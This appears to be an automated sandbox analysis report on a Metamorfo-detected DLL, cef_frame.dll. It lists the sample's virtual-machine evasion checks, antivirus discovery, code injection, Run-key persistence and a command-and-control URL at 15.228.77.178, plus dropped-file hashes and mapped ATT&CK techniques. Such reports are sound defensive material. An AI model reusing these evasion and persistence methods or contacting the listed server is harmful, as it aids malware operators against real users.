    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 440FE3C
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 32CB672
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 41A6910
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 4187ACC
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 3259D4F
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 32BA640
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 43BC1D8
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 320F8C7
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 4408BAB
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 320E2F8
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 416AC56
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 42261E6
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 3309BED
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 4705DCE
    Source: C:\Windows\System32\loaddll32.exe, API/Special instruction interceptor: Address: 330D7F9
    Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
    Source: C:\Windows\System32\loaddll32.exe, Thread delayed: delay time: 120000
    Source: Amcache.hve.11.dr, Binary or memory string: VMware
    Source: Amcache.hve.11.dr, Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.11.dr, Binary or memory string: vmci.syshbin
    Source: Amcache.hve.11.dr, Binary or memory string: VMware, Inc.
    Source: Amcache.hve.11.dr, Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.11.dr, Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.11.dr, Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.11.dr, Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.11.dr, Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: rundll32.exe, 00000011.00000002.2897887119.0000000003376000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'I
    Source: Amcache.hve.11.dr, Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.11.dr, Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.11.dr, Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.11.dr, Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.11.dr, Binary or memory string: vmci.sys
    Source: Amcache.hve.11.dr, Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.11.dr, Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.11.dr, Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.11.dr, Binary or memory string: VMware20,1
    Source: Amcache.hve.11.dr, Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.11.dr, Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.11.dr, Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.11.dr, Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.11.dr, Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.11.dr, Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.11.dr, Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.11.dr, Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.11.dr, Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.11.dr, Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.11.dr, Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\System32\loaddll32.exe, Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\rundll32.exe, Process queried: DebugPort (10 occurrences)

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 15.228.77.178 80
    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: Amcache.hve.11.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.11.dr, Binary or memory string: msmpeng.exe
    Source: Amcache.hve.11.dr, Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.11.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.11.dr, Binary or memory string: MsMpEng.exe
    Source: C:\Windows\SysWOW64\rundll32.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara match, File source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara match, File source: dump.pcap, type: PCAP

    MITRE ATT&CK Matrix: techniques with matching signatures (signature counts as shown in the report)

    Execution: Windows Management Instrumentation (1)
    Persistence: Registry Run Keys / Startup Folder (11), DLL Side-Loading (1)
    Privilege Escalation: Process Injection (111), Registry Run Keys / Startup Folder (11), DLL Side-Loading (1)
    Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (11), Process Injection (111), Rundll32 (1), DLL Side-Loading (1)
    Credential Access: Credential API Hooking (1)
    Discovery: Security Software Discovery (131), Process Discovery (1), Virtualization/Sandbox Evasion (11), System Information Discovery (11)
    Collection: Credential API Hooking (1)
    Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (12)
    No matching techniques: Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact
    Behavior Graph (graph image not recoverable; node contents listed below)

    Behavior Graph ID: 1592146
    Sample: cef_frame.dll
    Startdate: 15/01/2025
    Architecture: WINDOWS
    Score: 100
    DNS/IP: 171.39.242.20.in-addr.arpa
    Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected Metamorfo; 3 other signatures

    Process tree:
    • loaddll32.exe (started)
      Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Overwrites code with function prologues; Switches to a custom stack to bypass stack traces
      • rundll32.exe (started)
        DNS/IP: 15.228.77.178, 49852, 80 AMAZON-02US United States
        Signatures: System process connects to network (likely due to code injection or exploit); Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Creates an autostart registry key pointing to binary in C:\Windows
      • rundll32.exe (started)
        Signatures: Overwrites code with function prologues
      • rundll32.exe (started)
      • 6 other processes
        • rundll32.exe (started)
          Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          • WerFault.exe (started)
        • WerFault.exe (started)
        • WerFault.exe (started)
        • 3 other processes
    • rundll32.exe (started)
    • rundll32.exe (started)

    Source | Detection | Scanner
    cef_frame.dll | 30% | Virustotal
    cef_frame.dll | 34% | ReversingLabs
    cef_frame.dll | 100% | Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://15.228.77.178/ytr/serv.php | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    171.39.242.20.in-addr.arpa | unknown | unknown | false | (none) | high
    Name | Malicious | Antivirus Detection | Reputation
    http://15.228.77.178/ytr/serv.php | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://upx.sf.net | Amcache.hve.11.dr | false | (none) | high
    http://www.indyproject.org/ | rundll32.exe, 00000003.00000002.2431194998.0000000004B51000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2563309483.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2571642187.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2577672561.0000000007E8F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2462605650.000000000844F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2973058518.0000000007F3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2961091409.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2906768585.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2898272562.0000000004BD1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000003.2817042023.000000000825F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2865149640.00000000082CF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2825340181.0000000004A51000.00000020.00000001.01000000.00000003.sdmp | false | (none) | high
    IP | Domain | Country | ASN | ASN Name | Malicious
    15.228.77.178 | unknown | United States | 16509 | AMAZON-02US | true
    Joe Sandbox version: 42.0.0 Malachite
    Analysis ID: 1592146
    Start date and time: 2025-01-15 20:36:10 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 6m 37s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed: 30
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: cef_frame.dll
    Detection: MAL
    Classification: mal100.troj.evad.winDLL@28/29@1/1
    EGA Information: Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.42.73.29, 52.182.143.212, 13.107.246.45, 172.202.163.200, 20.190.159.4, 20.242.39.171, 4.245.163.56
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed; the report is missing behavior information.
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    14:37:31 | API Interceptor | 6x Sleep call for process: WerFault.exe modified
    14:37:37 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
    14:37:49 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
    20:38:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
    20:38:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
    Match | Associated Sample Name / URL | Detection | Threat Name
    15.228.77.178 | SecuriteInfo.com.Variant.Barys.394881.27394.14169.dll | malicious | Unknown
    15.228.77.178 | SecuriteInfo.com.Variant.Barys.394881.27394.14169.dll | malicious | Unknown
    15.228.77.178 | f_4_T_u_r_4_34536_45645_3345_wo.msi | malicious | Unknown
    15.228.77.178 | n_f_3_e_l_3_t_r_0_n_1_k_4_00545.msi | malicious | Unknown
    15.228.77.178 | n_f_3_f_1_s_k_4_l.msi | malicious | Unknown
    15.228.77.178 | Mandado-Intima#U00e7#U00e3o_Art516mlhg.msi | malicious | Unknown
    15.228.77.178 | z12A____o-Trabalhista.msi | malicious | Unknown
    15.228.77.178 | z1F_4_T_U_r_4_2024mfdfgryry5.msi | malicious | Unknown
    15.228.77.178 | F_4_T_U_R_4___nf____0992344.4354.msi | malicious | Unknown
    15.228.77.178 | rPEDIDOS-10032023-X491kkum.msi | malicious | Unknown
    No context
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    AMAZON-02US | Handler.exe | malicious | DanaBot, PureLog Stealer, Vidar | 108.139.47.33
    AMAZON-02US | https://fingertip.com/incoming-document | malicious | HTMLPhisher | 3.5.169.67
    AMAZON-02US | https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194 | malicious | Unknown | 52.74.136.124
    AMAZON-02US | https://lgray785.wixsite.com/my-site-4 | malicious | HTMLPhisher | 99.86.4.105
    AMAZON-02US | New order BPD-003777.exe | malicious | FormBook | 13.248.169.48
    AMAZON-02US | QQE81XYXon.dll | malicious | Wannacry | 63.35.17.92
    AMAZON-02US | PO -2025918.exe | malicious | FormBook, PureLog Stealer | 13.248.169.48
    AMAZON-02US | txWVWM8Kx4.dll | malicious | Wannacry | 52.34.64.1
    AMAZON-02US | hNgIvHRuTU.dll | malicious | Wannacry | 13.229.164.57
    AMAZON-02US | https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ | malicious | Unknown | 18.245.46.111
    No context
    No context
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 1.1801313481517355
    Encrypted: false
    SSDEEP: 192:Wt/di4Owm0kVvf1jeT/JZrtUKnzzuiFOZ24IO8dci:mipwNkVvf1jeJzzuiFOY4IO8dci
    MD5: 4825D64D38820A91F9350C58599D4D95
    SHA1: 8279E87418CD338C0149513DC9FDAE58F86870FF
    SHA-256: B0ABC4C2E331980BE5467E5AB8321B7E0757EC846E0ED03359E34A79B955D6F0
    SHA-512: 1C278D5608E328477CF704F73CF74F124A49C7C166FA18DC461EF89872A041DCAFEE0970826590B2883C66C19CB45D68FEA0CD8CF050ABB1FBEE612C1E5849C9
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 0.990564090228084
    Encrypted: false
    SSDEEP: 192:L2bqiAORbA0BU/wjeTO1KZrQtzuiFOZ24IO8dci:LixRbbBU/wjeGzuiFOY4IO8dci
    MD5: 16C3DD073E1FEE4FA2D5AF6C158CA75A
    SHA1: 8597182586234587FBE8AEFC62390409AA1F31D8
    SHA-256: 0B042E0023195870251F88A76AD453658218C1F935E635CD561A4023937A4BE2
    SHA-512: EA9AA7784866194D0AB5F61B6EEF5ABFE57D7C7F400F97A65F299D520690F81BDF37802CF581BB59B69AB8D4A10C4B04BC5B652B83E37A09BF356420A14B4257
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 0.9905160130207232
    Encrypted: false
    SSDEEP: 192:KPVmi/OHbA0BU/wjeT/KKZrQtzuiFpZ24IO8dci:MAimHbbBU/wjeuzuiFpY4IO8dci
    MD5: 563C8DDF572179D2797812CEDEB7DCBC
    SHA1: AAE288012993795F42B282EB96618709C4055904
    SHA-256: C1803B30825FDD183AFCCE73C35BD6A5E0612BFDECBBC6D98DCEC9794FCBBABB
    SHA-512: 07D8E22052A6A792898CE175D8E6B566771BD5F68E44902600806A23D09C7E05EA6BFB7004F8C28C89A6D71DB65E1EC881E59D93B7E0B29E6395BC689C9467C5
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 0.9961063049359593
    Encrypted: false
    SSDEEP: 192:UBiCOfb20BU/wjeT/KKZrQtzuiFOZ24IO84ci:eijfbdBU/wjeuzuiFOY4IO84ci
    MD5: 570261F1A3B729446127639B1222F5A0
    SHA1: 030FB6CAE3935F0EBF3978D29F51D5F91754DE73
    SHA-256: E13B91E46434568034F9C1FFF2BBAC01F9B9E4751235B9CB137BE8F38495B77B
    SHA-512: 6335328EF95660F938E34FE0C8A1ACB0E9840FB54AD567487BDE876478712F523996232433E8C0446B3D9A4C9D68C08F611CCBA1EA33A610EFA46779FA9085DA
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 0.9959570672744001
    Encrypted: false
    SSDEEP: 192:nwkRigOJb20BU/wjeT/JZrt8tzuiFOZ24IO84ci:tiRJbdBU/wjeGzuiFOY4IO84ci
    MD5: 5869718E6944364252532CFBB91F63BB
    SHA1: 723A38B8A2599F7D2CCD41DC81692035D95DEC3E
    SHA-256: 0EE855E01E3B92D8FC71054327074714744751505741CDFBCBE30148B4016186
    SHA-512: E1A5ECC1FF8472453AC452037D162D9E35767BC699D098BAF5DC893917FD4567FB88078613613824AB12ECA10A3B041084C5544423C1E84B25EF529E9D910020
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 65536
    Entropy (8bit): 1.1798078083822947
    Encrypted: false
    SSDEEP: 192:1Ai4Od60o89HjeT/JZrtUKnzzuiFOZ24IO8dci:eipdBo89HjeJzzuiFOY4IO8dci
    MD5: C919D21CCFC4979C736F0D32D043F418
    SHA1: 9A547E30E9BE7D5450D09E8A018F045DAA8B0F65
    SHA-256: 402DFE4222BBD2CA7C04ED77ED888F2B2D9B9217DB480F406285215475336F05
    SHA-512: F236899D443F660229373984554A2D931D0FAE09C0247DDE073DFF484C179818B1934005744E72D6226239BB7BAB0DD0448852640515F509BBF36DC0476DB942
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:43 2025, 0x1205a4 type
    Category: dropped
    Size (bytes): 46980
    Entropy (8bit): 1.9743481082894414
    Encrypted: false
    SSDEEP: 192:6PJC8HVJYXsa5O5H4zWwKSCNxAf+teakL:UCH85HzXAf+tg
    MD5: A855002B8E1F48E03988C08EF9DC0705
    SHA1: 35AFBBEF9A16C53D8543BD08418A4DDCEBBFBC2B
    SHA-256: 84A712FBA8EC7CD4A923320593444DCB3BCCE4571602E451760CA2F79348A8E7
    SHA-512: 19605A540466EAA82AE9D6CA010C4109A3077C2CD558274A3CF8A06183327D597419DC75877DA2DFB5EA179FBD4119732F7A1D2C20F029B2077BC8A7AF461F77
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 8352
    Entropy (8bit): 3.6921742662173154
    Encrypted: false
    SSDEEP: 192:R6l7wVeJeF626Ypp62gmf8/fXpr089bxVsfvZbm:R6lXJE626Y362gmf8/fLxufg
    MD5: BF01BAC363EEF2AA05148A3402D5DCDC
    SHA1: 6E4E912CC9EBCCAEB905AAF0380EFD527EA18CCB
    SHA-256: 77A9F68ED6E49F4BFDA72BFEC1B501FFF35A887627C9CF34DD8E02714920CAD2
    SHA-512: 7C11253A757CADB4E1350DA821DA4664787F62DCA2E5CC3A3354A628B4DE67B8A7051FABB6A68952669D212A89B890F971BEE749257D00098BF8EBAC9975EC8B
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: XML 1.0 document, ASCII text, with CRLF line terminators
    Category: dropped
    Size (bytes): 4749
    Entropy (8bit): 4.446091998175132
    Encrypted: false
    SSDEEP: 48:cvIwWl8zseJg77aI9n0WpW8VY5YsYm8M4JCdP5XF9Qi+q8vjP52GScSDd:uIjfUI7Jt7VmsJkQiK8J3Dd
    MD5: BCF32556AFD941643E529BD03A4E5223
    SHA1: 52195E74E22DFECA32129131FE57F3FAA2781F6C
    SHA-256: B8304E6CFF696A1AD59836347932E6F170719EB3F1451DDBF80F563E1BEEB585
    SHA-512: AA64398E0D03E4EF4F2642A20D5BBBE57488581FEDEDC622AAE2FF83B23BF7921BABE03AEB33D802807CCA634EBE43C926FED9DB832EDDB09869A65C09C5C9DD
    Malicious: false
    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:09 2025, 0x1205a4 type
    Category: dropped
    Size (bytes): 46924
    Entropy (8bit): 1.9773734180101197
    Encrypted: false
    SSDEEP: 192:U2JC8YxkTXQaJhXO5H4u3pLgiltuOj/KLnBLJM:1CoJU5H/ZLK2y
    MD5: 0952A070C090459A016738AD025168DC
    SHA1: 1EAE28C3A9798ACEE2A2A75ED498D489AF905EB4
    SHA-256: 58B105F3EDF4ABDF93B2C525A69557889B25FA2AA1581F4240FAE2EC7DFB5B7D
    SHA-512: 5ACEE99413B428158DBB82FA6DBD32C38B0F1D000485E83720C7243EEEBE92BDCE3AA44A85219559787FC2EEBD673D3E8836C8AC40BCEB62FF2458FC986B03F9
    Malicious: false
    Process: C:\Windows\SysWOW64\WerFault.exe
    File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category: dropped
    Size (bytes): 8358
    Entropy (8bit): 3.6929156957593596
    Encrypted: false
    SSDEEP: 192:R6l7wVeJ4T690+6Yy269ggmf8/fXprx89bQAsfZwm:R6lXJ06O+6Yr69ggmf8/fkQTfb
    MD5: 4EAB179661B57E9DB3E3829F2C284DE3
